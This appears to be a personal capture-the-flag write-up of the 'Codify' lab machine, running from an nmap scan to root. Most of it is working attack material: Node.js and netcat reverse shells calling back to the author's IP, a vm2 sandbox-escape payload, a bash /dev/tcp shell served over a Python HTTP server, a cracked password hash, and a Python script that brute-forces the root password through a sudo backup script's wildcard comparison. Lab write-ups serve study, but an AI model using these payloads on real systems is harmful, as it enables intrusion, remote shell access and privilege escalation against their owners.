started with nmap 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-05 15:37 EST
Nmap scan report for 10.10.11.239
Host is up (0.11s latency).
Not shown: 997 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 96:07:1c:c6:77:3e:07:a0:cc:6f:24:19:74:4d:57:0b (ECDSA)
|_  256 0b:a4:c0:cf:e2:3b:95:ae:f6:f5:df:7d:0c:88:d6:ce (ED25519)
80/tcp   open  http    Apache httpd 2.4.52
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Did not follow redirect to http://codify.htb/
3000/tcp open  http    Node.js Express framework
|_http-title: Codify
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=1/5%OT=22%CT=1%CU=33451%PV=Y%DS=2%DC=I%G=Y%TM=65986
OS:8BF%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=10B%TI=Z%CI=Z%II=I%TS=A)O
OS:PS(O1=M53AST11NW7%O2=M53AST11NW7%O3=M53ANNT11NW7%O4=M53AST11NW7%O5=M53AS
OS:T11NW7%O6=M53AST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)E
OS:CN(R=Y%DF=Y%T=40%W=FAF0%O=M53ANNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F
OS:=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5
OS:(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z
OS:%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=
OS:N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%
OS:CD=S)

Network Distance: 2 hops
Service Info: Host: codify.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.27 seconds

node.js is exist in the webpage that i could use to get reverse shell

(function(){
    var net = require("net"),
        cp = require("child_process"),
        sh = cp.spawn("/bin/sh", []);
    var client = new net.Socket();
    client.connect(8081, "10.10.16.89", function(){
        client.pipe(sh.stdin);
        sh.stdout.pipe(client);
        sh.stderr.pipe(client);
    });
    return /a/; // Prevents the Node.js application form crashing
})();

this script didnt work cause of child_process

rm /tmp/f;mkfifo /tmp/f;cat/tmp/f|/bin/sh -i2>&1|nc 10.10.16.89 8081 >/tmp/f'

found a script that should work but webpage doesnt respond

const { VM } = require("vm2");
const vm = new VM();

const code = `
err = {};
const handler = {
    getPrototypeOf(target) {
        (function stack() {
            new Error().stack;
            stack();
        })();
    }
};
  
const proxiedErr = new Proxy(err, handler);
try {
    throw proxiedErr;
} catch ({constructor: c}) {
    c.constructor('return process')
().mainModule.require('child_process').execSync('ls -la');
})();
`
github(https://gist.github.com/leesh3288/381b230b04936dd4d74aaf90cc8bb244)

after all that i found a script that did work but i had to change the code abit

(https://gist.github.com/leesh3288/e4aa7b90417b0b0ac7bcd5b09ac7d3bd)

a needed to create file with   
    #!/bin/bash
    bash -i -p >& /dev/tcp/_Tun0IP_/6969 0>&1
and call it shell.sh

then i needed to open python3 server:
    python3 -m http.server 80
and downloaded the script i created to the machine

give it a chmod +x shell.sh

and run it on in the script 

after nc -lvnp 4444 and get the reverse shell

cant do anything with sudo -l

inside there was linpeas.sh without +x (maybe someone else uploaded it) gave it +x and run it

there is username joshua, svc

at /var/www/contact i found ticket.db,inside there was joshua and hashed pass:
    $2a$12$SOn8Pf6z8fO/nVsNbAAequ/P6vLRJJl7gCUEiYBU2iLHn4G/p/Zw2
give it to john the ripper, hes decrypted it:

    spongebob1

lets try ssh and it worked

the user flag:
    fb47241ced8e5a5680c648cf06e1451f

sudo -l gave me 
    User joshua may run the following commands on codify:
    (root) /opt/scripts/mysql-backup.sh

found a script that could help me extract a root password from the /mysql-backup.sh:
    import string
import subprocess

all_chars = list(string.ascii_letters + string.digits)
passwd = ""
fl = 0

while not fl:
        for char in all_chars:
                command = f"echo '{passwd}{char}*' | sudo /opt/scripts/mysql-backup.sh"
                out = subprocess.run(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True, text=True).stdout
                if "confirmed" in out:
                        passwd += char
                        print(f"\r{passwd}", end='')
                        break
        else:
                fl = 1
                print()

the password is:
    kljh12k3jhaskjh12kjh3
after that su root, now im root

root flag:
    385e7e197fd2c575893304324f0f29dd
